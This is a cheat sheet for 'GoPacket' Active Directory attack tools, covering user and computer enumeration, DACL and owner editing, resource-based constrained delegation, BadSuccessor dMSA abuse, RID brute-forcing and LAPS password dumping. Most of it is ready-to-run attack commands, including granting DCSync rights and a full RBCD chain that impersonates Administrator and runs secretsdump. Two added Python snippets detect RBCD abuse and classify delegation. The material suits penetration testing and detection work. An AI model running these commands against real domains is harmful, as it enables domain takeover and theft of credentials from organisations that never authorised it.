# GoPacket: Active Directory

## Quick Reference

| Tool | Purpose |
|---|---|
| GetADUsers.py | Enumerate AD user accounts |
| GetADComputers.py | Enumerate AD computer accounts |
| addcomputer.py | Add a computer account to the domain |
| dacledit.py | Read/write/remove DACL ACEs on AD objects |
| rbcd.py | Set/read/remove msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD) |
| findDelegation.py | Enumerate all delegation relationships |
| owneredit.py | Read/change owner of an AD object |
| badsuccessor.py | dMSA exploitation (CVE-2025-29895 / BadSuccessor) |
| lookupsid.py | Enumerate users/groups via SID brute-force (RPC) |
| samrdump.py | Enumerate users via SAMR |
| ldap_shell.py | Interactive LDAP shell |
| machineAccountQuota.py | Read the ms-DS-MachineAccountQuota value |
| GetLAPSPassword.py | Read LAPS passwords from LDAP |
## GetADUsers.py

Enumerate Active Directory user accounts via LDAP.

Syntax:

```bash
GetADUsers.py [options] <domain>[/<username>[:<password>]]
```

Common Usage:

```bash
# List all users with email addresses
GetADUsers.py <domain>/<username>:<password> -dc-ip <dc-ip>
# List ALL users including disabled / no-email
GetADUsers.py <domain>/<username>:<password> -all -dc-ip <dc-ip>
# Specific user
GetADUsers.py <domain>/<username>:<password> -user <username> -dc-ip <dc-ip>
# Pass-the-Hash
GetADUsers.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip>
# Kerberos (ccache)
KRB5CCNAME=<ticket> GetADUsers.py -k -no-pass <domain>/<username> -dc-ip <dc-ip>
```

Options:

- `-user <username>`: Query a specific user
- `-all`: Include disabled accounts and accounts without email
- `-hashes <lm-hash>:<nt-hash>`: NTLM hash auth
- `-k` / `-no-pass`: Kerberos via ccache
- `-aesKey <aes256-key>`: AES Kerberos key
- `-dc-ip <dc-ip>`: DC IP
- `-dc-host <hostname>`: DC hostname
## GetADComputers.py

Enumerate Active Directory computer accounts via LDAP.

Syntax:

```bash
GetADComputers.py [options] <domain>[/<username>[:<password>]]
```

Common Usage:

```bash
# List all computers
GetADComputers.py <domain>/<username>:<password> -dc-ip <dc-ip>
# Resolve IPs (nslookup via DC)
GetADComputers.py <domain>/<username>:<password> -resolveIP -dc-ip <dc-ip>
# Specific computer
GetADComputers.py <domain>/<username>:<password> -user <computername> -dc-ip <dc-ip>
# Pass-the-Hash
GetADComputers.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip>
# Kerberos (ccache)
KRB5CCNAME=<ticket> GetADComputers.py -k -no-pass <domain>/<username> -dc-ip <dc-ip>
```

Options:

- `-user <name>`: Filter by specific computer name
- `-resolveIP`: Resolve computer IPs via DC nslookup
- `-hashes <lm-hash>:<nt-hash>`: NTLM hash auth
- `-k` / `-no-pass`: Kerberos via ccache
- `-aesKey <aes256-key>`: AES Kerberos key
- `-dc-ip <dc-ip>`: DC IP
- `-dc-host <hostname>`: DC hostname
## addcomputer.py

Add a computer account to the domain (required for RBCD attacks when MAQ > 0).

Syntax:

```bash
addcomputer.py [options] <domain>/<username>[:<password>]
```

Common Usage:

```bash
# Add computer with random name and password (SAMR over SMB)
addcomputer.py <domain>/<username>:<password> -dc-ip <dc-ip>
# Add computer with specific name and password
addcomputer.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -computer-name <computername>$ -computer-pass <password>
# Add via LDAPS
addcomputer.py <domain>/<username>:<password> -method LDAPS -dc-ip <dc-ip> \
    -computer-name <computername>$ -computer-pass <password>
# Delete a computer account
addcomputer.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -computer-name <computername>$ -delete
# Pass-the-Hash
addcomputer.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip>
# Kerberos (ccache)
KRB5CCNAME=<ticket> addcomputer.py -k -no-pass <domain>/<username> -dc-ip <dc-ip>
```

Options:

- `-computer-name <name>$`: Name for the new computer (must end with `$`)
- `-computer-pass <password>`: Password for the new computer
- `-no-add`: Don't add, just set the password on an existing account
- `-delete`: Delete the specified computer account
- `-method {SAMR,LDAPS}`: Method (SAMR over SMB is the default; LDAPS requires a cert)
- `-port {139,445,636}`: Port (SAMR default 445, LDAPS 636)
- `-domain-netbios <name>`: NetBIOS domain name
- `-baseDN <dn>`: LDAP base DN
- `-computer-group <dn>`: Target OU/group for the new computer
- `-hashes <lm-hash>:<nt-hash>`: NTLM hash auth
- `-dc-ip <dc-ip>`: DC IP
- `-dc-host <hostname>`: DC hostname

Notes:

- Check MAQ first: `machineAccountQuota.py <domain>/<username>:<password>`
- The default MAQ is 10, so any domain user can add up to 10 machines
## dacledit.py

Read, write, remove, backup, or restore DACL ACEs on Active Directory objects.

Syntax:

```bash
dacledit.py [options] <domain>/<username>[:<password>]
```

Common Usage:

```bash
# Read DACL of a target object
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -target <target-user> -action read
# Grant FullControl to attacker-controlled account
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -principal <attacker-user> -target <target-object> \
    -action write -rights FullControl
# Grant DCSync rights (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All)
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -principal <username> -target <domain-dn> \
    -action write -rights DCSync
# Grant ResetPassword
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -principal <username> -target <target-user> \
    -action write -rights ResetPassword
# Grant WriteMembers (add self to group)
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -principal <username> -target <group-name> \
    -action write -rights WriteMembers
# Remove an ACE
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -principal <username> -target <target-object> \
    -action remove -rights FullControl
# Backup DACL before modification
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -target <target-object> -action backup -file <output>
# Restore DACL from backup
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -target <target-object> -action restore -file <output>
# Pass-the-Hash
dacledit.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip> \
    -principal <username> -target <target> -action write -rights FullControl
# Use LDAPS
dacledit.py <domain>/<username>:<password> -use-ldaps -dc-ip <dc-ip> \
    -principal <username> -target <target> -action write -rights FullControl
```

Options:

- `-principal <name>`: Attacker-controlled account (sAMAccountName)
- `-principal-sid <sid>`: Principal by SID
- `-principal-dn <dn>`: Principal by DN
- `-target <name>`: Target object to edit (sAMAccountName)
- `-target-sid <sid>`: Target by SID
- `-target-dn <dn>`: Target by DN
- `-action [{read,write,remove,backup,restore}]`: Action
- `-rights [{FullControl,ResetPassword,WriteMembers,DCSync,Custom}]`: Rights to set
- `-rights-guid <guid>`: Custom right GUID
- `-ace-type [{allowed,denied}]`: ACE type (default: allowed)
- `-inheritance`: Enable ACE inheritance (for OUs/containers)
- `-mask <mask>`: Force access mask
- `-file <filename>`: File for backup/restore
- `-use-ldaps`: Use LDAPS
- `-hashes <lm-hash>:<nt-hash>`: NTLM hash auth
- `-dc-ip <dc-ip>`: DC IP
## rbcd.py

Read, write, remove, or flush msDS-AllowedToActOnBehalfOfOtherIdentity for RBCD attacks.

Syntax:

```bash
rbcd.py [options] -delegate-to <target> <domain>/<username>[:<password>]
```

Common Usage:

```bash
# Read current RBCD settings on a target
rbcd.py -delegate-to <target-computer>$ -action read \
    <domain>/<username>:<password> -dc-ip <dc-ip>
# Write RBCD: allow attacker computer to delegate to target
rbcd.py -delegate-to <target-computer>$ -delegate-from <attacker-computer>$ \
    -action write <domain>/<username>:<password> -dc-ip <dc-ip>
# Remove RBCD entry
rbcd.py -delegate-to <target-computer>$ -delegate-from <attacker-computer>$ \
    -action remove <domain>/<username>:<password> -dc-ip <dc-ip>
# Flush all RBCD entries
rbcd.py -delegate-to <target-computer>$ -action flush \
    <domain>/<username>:<password> -dc-ip <dc-ip>
# Pass-the-Hash
rbcd.py -hashes <lm-hash>:<nt-hash> -delegate-to <target-computer>$ \
    -delegate-from <attacker-computer>$ -action write <domain>/<username> -dc-ip <dc-ip>
# Use LDAPS
rbcd.py -use-ldaps -delegate-to <target-computer>$ -delegate-from <attacker-computer>$ \
    -action write <domain>/<username>:<password> -dc-ip <dc-ip>
```

Options:

- `-delegate-to <name>`: Target computer account (the one being delegated TO)
- `-delegate-from <name>`: Attacker computer account (the one that will delegate)
- `-action [{read,write,remove,flush}]`: Action to perform
- `-use-ldaps`: Use LDAPS
- `-hashes <lm-hash>:<nt-hash>`: NTLM hash auth
- `-k` / `-no-pass`: Kerberos via ccache
- `-aesKey <aes256-key>`: AES Kerberos key
- `-dc-ip <dc-ip>`: DC IP
- `-dc-host <hostname>`: DC hostname

Full RBCD Attack Chain:

```bash
# 1. Add machine account
addcomputer.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -computer-name FAKE$ -computer-pass FakePass123!
# 2. Write RBCD
rbcd.py -delegate-to <target>$ -delegate-from FAKE$ -action write \
    <domain>/<username>:<password> -dc-ip <dc-ip>
# 3. Get impersonation ticket
getST.py -spn cifs/<target> -impersonate Administrator \
    -dc-ip <dc-ip> -hashes aad3b435b51404eeaad3b435b51404ee:<nt-hash> \
    <domain>/FAKE$
# 4. Use ticket
KRB5CCNAME=Administrator@cifs_<target>.ccache secretsdump.py -k -no-pass \
    <domain>/Administrator@<target>
```
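The defender's view of the chain above, added here as an example and not part of the cheat sheet: steps 1 and 2 leave a computer-account creation (Security event 4741) followed by a write to msDS-AllowedToActOnBehalfOfOtherIdentity (event 5136) by the same subject. The correlation below runs over constructed event records whose field names follow the Security log's EventData; the one-hour window is an assumption.

```python
"""Correlate 4741 (computer account created) with a later 5136 write to the
RBCD attribute by the same subject. Sample events are constructed."""
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
WINDOW = timedelta(hours=1)  # assumed correlation window

# Constructed sample events; keys mirror EventData fields of the Security log.
EVENTS = [
    {"EventID": 4741, "TimeCreated": "2025-06-01T10:00:00",
     "SubjectUserName": "jdoe", "TargetUserName": "FAKE$"},
    {"EventID": 5136, "TimeCreated": "2025-06-01T10:02:30",
     "SubjectUserName": "jdoe",
     "ObjectDN": "CN=FILESRV,CN=Computers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "Value Added"},
    {"EventID": 5136, "TimeCreated": "2025-06-01T11:30:00",
     "SubjectUserName": "svc-sccm",
     "ObjectDN": "CN=WEB01,CN=Computers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": "Value Added"},
]


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def find_rbcd_chains(events, window=WINDOW):
    """Return (subject, new_computer, target_dn) for every RBCD write that follows
    a computer-account creation by the same subject within `window`."""
    created = {}  # subject -> [(time, computer name), ...]
    hits = []
    for e in sorted(events, key=_ts):
        subj = e["SubjectUserName"]
        if e["EventID"] == 4741:
            created.setdefault(subj, []).append((_ts(e), e["TargetUserName"]))
        elif (e["EventID"] == 5136
              and e["AttributeLDAPDisplayName"] == RBCD_ATTR
              and e["OperationType"] == "Value Added"):
            # AttributeValue on 5136 is a security-descriptor blob, so the match
            # is keyed on attribute name and subject, not on the value.
            for when, name in created.get(subj, []):
                if 0 <= (_ts(e) - when).total_seconds() <= window.total_seconds():
                    hits.append((subj, name, e["ObjectDN"]))
    return hits


def rbcd_writes(events):
    """Every write to the RBCD attribute, chained or not; each merits review."""
    return [(e["SubjectUserName"], e["ObjectDN"]) for e in events
            if e["EventID"] == 5136 and e["AttributeLDAPDisplayName"] == RBCD_ATTR]


if __name__ == "__main__":
    for subj, comp, target in find_rbcd_chains(EVENTS):
        print(f"RBCD chain: {subj} created {comp} then delegated it to {target}")
```

Event 5136 is only generated when Directory Service Changes auditing is enabled and the computer objects carry a write SACL, so confirm that before relying on this rule.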
## findDelegation.py

Enumerate all delegation relationships in the domain (unconstrained, constrained, RBCD).

Syntax:

```bash
findDelegation.py [options] <domain>[/<username>[:<password>]]
```

Common Usage:

```bash
# Enumerate all delegations
findDelegation.py <domain>/<username>:<password> -dc-ip <dc-ip>
# Include disabled accounts
findDelegation.py <domain>/<username>:<password> -disabled -dc-ip <dc-ip>
# Specific user
findDelegation.py <domain>/<username>:<password> -user <username> -dc-ip <dc-ip>
# Cross-trust
findDelegation.py <domain>/<username>:<password> -target-domain <domain> -dc-ip <dc-ip>
# Pass-the-Hash
findDelegation.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip>
```

Options:

- `-user <username>`: Filter by specific user
- `-disabled`: Include disabled accounts
- `-target-domain <domain>`: Query across trust
- `-hashes <lm-hash>:<nt-hash>`: NTLM hash auth
- `-k` / `-no-pass`: Kerberos via ccache
- `-aesKey <aes256-key>`: AES Kerberos key
- `-dc-ip <dc-ip>`: DC IP
- `-dc-host <hostname>`: DC hostname

Notes:

- Look for `TRUSTED_FOR_DELEGATION`: unconstrained delegation (highest value)
- Look for `msDS-AllowedToDelegateTo`: constrained delegation
- Look for `msDS-AllowedToActOnBehalfOfOtherIdentity`: RBCD
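The three markers in the notes, applied to raw LDAP entries. This is an added example, not part of the cheat sheet or of findDelegation.py: it decodes the relevant userAccountControl bits (including TRUSTED_TO_AUTH_FOR_DELEGATION for protocol transition and NOT_DELEGATED, which marks accounts that cannot be delegated) and checks the two msDS-* attributes. The entries are constructed.

```python
"""Classify delegation from LDAP attributes. Sample entries are constructed."""

TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller machine account


def classify(entry):
    """Return the delegation findings for one LDAP entry (a dict of attributes)."""
    uac = int(entry.get("userAccountControl", 0))
    findings = []
    if uac & TRUSTED_FOR_DELEGATION:
        # Every DC carries this bit; a member server or user with it is the real finding.
        tag = " (DC, expected)" if uac & SERVER_TRUST_ACCOUNT else ""
        findings.append("Unconstrained" + tag)
    targets = entry.get("msDS-AllowedToDelegateTo") or []
    if targets:
        kind = ("Constrained w/ Protocol Transition"
                if uac & TRUSTED_TO_AUTH_FOR_DELEGATION else "Constrained")
        findings.append(f"{kind}: {', '.join(targets)}")
    if entry.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        # The value is a binary security descriptor listing who may delegate TO
        # this object; its mere presence marks the object as an RBCD target.
        findings.append("RBCD (inbound)")
    return findings


def is_protected(entry):
    """True when the account is marked 'sensitive and cannot be delegated'."""
    return bool(int(entry.get("userAccountControl", 0)) & NOT_DELEGATED)


# Constructed sample entries, shaped like the attributes an LDAP search returns.
ENTRIES = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x1001000,
     "msDS-AllowedToDelegateTo": ["cifs/filesrv.corp.local", "http/filesrv.corp.local"]},
    {"sAMAccountName": "FILESRV$", "userAccountControl": 0x1000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},  # truncated SD blob
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200},
    {"sAMAccountName": "da-admin", "userAccountControl": 0x100200},
]


def report(entries):
    """Map sAMAccountName to findings, omitting entries with none."""
    return {e["sAMAccountName"]: classify(e) for e in entries if classify(e)}


if __name__ == "__main__":
    for name, findings in report(ENTRIES).items():
        print(f"{name}: {'; '.join(findings)}")
```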
## owneredit.py

Read or change the owner attribute of an Active Directory object.

Syntax:

```bash
owneredit.py [options] <domain>/<username>[:<password>]
```

Common Usage:

```bash
# Read current owner
owneredit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -target <target-object> -action read
# Set new owner (take ownership of an object)
owneredit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -new-owner <attacker-username> -target <target-object> -action write
# Pass-the-Hash
owneredit.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip> \
    -new-owner <username> -target <target> -action write
# Use LDAPS
owneredit.py <domain>/<username>:<password> -use-ldaps -dc-ip <dc-ip> \
    -new-owner <username> -target <target> -action write
```

Options:

- `-new-owner <name>`: sAMAccountName of new owner
- `-new-owner-sid <sid>`: New owner by SID
- `-new-owner-dn <dn>`: New owner by DN
- `-target <name>`: Target object (sAMAccountName)
- `-target-sid <sid>`: Target by SID
- `-target-dn <dn>`: Target by DN
- `-action [{read,write}]`: Action
- `-use-ldaps`: Use LDAPS
- `-hashes <lm-hash>:<nt-hash>`: NTLM hash auth
- `-dc-ip <dc-ip>`: DC IP

Notes:

- After taking ownership, use dacledit.py to grant FullControl to self
## badsuccessor.py

dMSA (Delegated Managed Service Accounts) exploitation (BadSuccessor / CVE-2025-29895).

Syntax:

```bash
badsuccessor.py [options] <domain>/<username>[:<password>]
```

Common Usage:

```bash
# Search for existing dMSAs
badsuccessor.py <domain>/<username>:<password> -dc-ip <dc-ip> -action search
# Add a new dMSA in a specific OU (to inherit target account's privileges)
badsuccessor.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -action add -target-ou "OU=weakOU,DC=<domain>,DC=local"
# Add dMSA with specific name targeting DA account
badsuccessor.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -action add -target-ou "OU=weakOU,DC=<domain>,DC=local" \
    -dmsa-name evilDMSA -target-account Administrator
# Modify existing dMSA to target a specific account
badsuccessor.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -action modify -target-ou "OU=weakOU,DC=<domain>,DC=local" \
    -dmsa-name evilDMSA -target-account Administrator
# Delete a dMSA
badsuccessor.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -action delete -target-ou "OU=weakOU,DC=<domain>,DC=local" \
    -dmsa-name evilDMSA
# Use LDAPS
badsuccessor.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -method LDAPS -action add -target-ou "OU=weakOU,DC=<domain>,DC=local"
```

Options:

- `-action {add,delete,modify,search}`: Action
- `-dmsa-name <name>`: dMSA name (random if omitted)
- `-target-ou <dn>`: OU to create the dMSA in
- `-target-account <username>`: Account to set as ManagedAccountPrecededByLink
- `-principals-allowed <username>`: Account allowed to retrieve the managed password
- `-dns-hostname <hostname>`: DNS hostname for the dMSA
- `-method {LDAP,LDAPS}`: Protocol
- `-port {389,636}`: Port
- `-hashes <lm-hash>:<nt-hash>`: NTLM hash auth
- `-dc-ip <dc-ip>`: DC IP
- `-dc-host <hostname>`: DC hostname
## lookupsid.py

Enumerate users, groups, and domain SIDs by brute-forcing RIDs over SMB.

Syntax:

```bash
lookupsid.py [options] <domain>/<username>:<password>@<target> [maxRid]
```

Common Usage:

```bash
# Enumerate all SIDs up to RID 4000
lookupsid.py <domain>/<username>:<password>@<target>
# Custom max RID
lookupsid.py <domain>/<username>:<password>@<target> 10000
# Get domain SID (used for ticket forging)
lookupsid.py <domain>/<username>:<password>@<target> | grep 'Domain SID'
# Enumerate domain SIDs (forward to DC)
lookupsid.py <domain>/<username>:<password>@<target> -domain-sids
# Pass-the-Hash
lookupsid.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>
# Unauthenticated (null session; rare but possible)
lookupsid.py -no-pass <domain>/anonymous@<target>
```

Options:

- `maxRid`: Max RID to check (default 4000)
- `-domain-sids`: Enumerate domain SIDs
- `-target-ip <target>`: Target IP when the name can't resolve
- `-port <port>`: Destination port
- `-hashes <lm-hash>:<nt-hash>`: NTLM hash auth
- `-k`: Kerberos auth
## samrdump.py

Enumerate user accounts via SAMR (Security Account Manager Remote Protocol).

Syntax:

```bash
samrdump.py [options] <domain>/<username>:<password>@<target>
```

Common Usage:

```bash
# List users
samrdump.py <domain>/<username>:<password>@<target>
# CSV output
samrdump.py -csv <domain>/<username>:<password>@<target>
# Pass-the-Hash
samrdump.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>
# Kerberos (ccache)
KRB5CCNAME=<ticket> samrdump.py -k -no-pass <domain>/<username>@<target>
```

Options:

- `-csv`: Output in CSV format
- `-hashes <lm-hash>:<nt-hash>`: NTLM hash auth
- `-k` / `-no-pass`: Kerberos via ccache
- `-aesKey <aes256-key>`: AES Kerberos key
- `-dc-ip <dc-ip>`: DC IP
- `-target-ip <target>`: Target IP override
- `-port <port>`: Destination port
## ldap_shell.py

Interactive LDAP shell for AD enumeration and modification.

Syntax:

```bash
ldap_shell.py [options] <domain>/<username>:<password>@<target>
```

Common Usage:

```bash
# Connect with password
ldap_shell.py <domain>/<username>:<password>@<dc-ip>
# Pass-the-Hash
ldap_shell.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<dc-ip>
# Kerberos (ccache)
KRB5CCNAME=<ticket> ldap_shell.py -k -no-pass <domain>/<username>@<dc-ip>
# Use LDAPS
ldap_shell.py -ldaps <domain>/<username>:<password>@<dc-ip>
# Dump LDAP to directory
ldap_shell.py <domain>/<username>:<password>@<dc-ip> -dump-dir /tmp/ldapdump
```

Options:

- `-hashes <lm-hash>:<nt-hash>`: NTLM hash auth
- `-k` / `-no-pass`: Kerberos via ccache
- `-aesKey <aes256-key>`: AES Kerberos key
- `-dc-ip <dc-ip>`: DC IP
- `-ldaps`: Use LDAPS
- `-dump-dir <path>`: Directory for domain dump files

Shell Commands (once connected):

- `help`: list available commands
- `get_ad_users`: list all AD users
- `get_ad_groups`: list all AD groups
- `get_laps_password <cn>`: read LAPS password
- `add_computer <name> <password>`
- `change_password <user> <newpass>`
- `set_rbcd <attacker$> <target$>`
- `add_user_to_group <user> <group>`
## machineAccountQuota.py

Read the ms-DS-MachineAccountQuota attribute, i.e. how many machines a regular user can add.

Syntax:

```bash
machineAccountQuota.py [options] <domain>/<username>[:<password>]
```

Common Usage:

```bash
# Check MAQ
machineAccountQuota.py <domain>/<username>:<password> -dc-ip <dc-ip>
# Pass-the-Hash
machineAccountQuota.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip>
# Use LDAPS
machineAccountQuota.py -use-ldaps <domain>/<username>:<password> -dc-ip <dc-ip>
```

Options:

- `-use-ldaps`: Use LDAPS
- `-hashes <lm-hash>:<nt-hash>`: NTLM hash auth
- `-k` / `-no-pass`: Kerberos via ccache
- `-aesKey <aes256-key>`: AES Kerberos key
- `-dc-ip <dc-ip>`: DC IP

Notes:

- Default MAQ = 10 (any authenticated user can add 10 machines)
- MAQ = 0 means only admins can add computers; RBCD then requires credentials for an existing machine account
## GetLAPSPassword.py

Extract LAPS (Local Administrator Password Solution) passwords from LDAP for readable computer objects.

Syntax:

```bash
GetLAPSPassword.py [options] <domain>[/<username>[:<password>]]
```

Common Usage:

```bash
# Dump all readable LAPS passwords
GetLAPSPassword.py <domain>/<username>:<password> -dc-ip <dc-ip>
# Target specific computer
GetLAPSPassword.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -computer <computername>
# Save to file
GetLAPSPassword.py <domain>/<username>:<password> -dc-ip <dc-ip> \
    -outputfile <output>
# Pass-the-Hash
GetLAPSPassword.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip>
# Kerberos (ccache)
KRB5CCNAME=<ticket> GetLAPSPassword.py -k -no-pass <domain>/<username> -dc-ip <dc-ip>
# Use LDAPS (required for Windows Server 2025 with LDAPS enforcement)
GetLAPSPassword.py <domain>/<username>:<password> -dc-ip <dc-ip> -ldaps
```

Options:

- `-computer <name>`: Target a specific computer by name
- `-outputfile <output>`: Save output to file
- `-ldaps`: Use LDAPS
- `-hashes <lm-hash>:<nt-hash>`: NTLM hash auth
- `-k` / `-no-pass`: Kerberos via ccache
- `-aesKey <aes256-key>`: AES Kerberos key
- `-dc-ip <dc-ip>`: DC IP
- `-dc-host <hostname>`: DC hostname

Notes:

- Reads `ms-Mcs-AdmPwd` (LAPSv1) or `msLAPS-Password` (LAPSv2)
- Only returns passwords readable under the authenticated user's ACL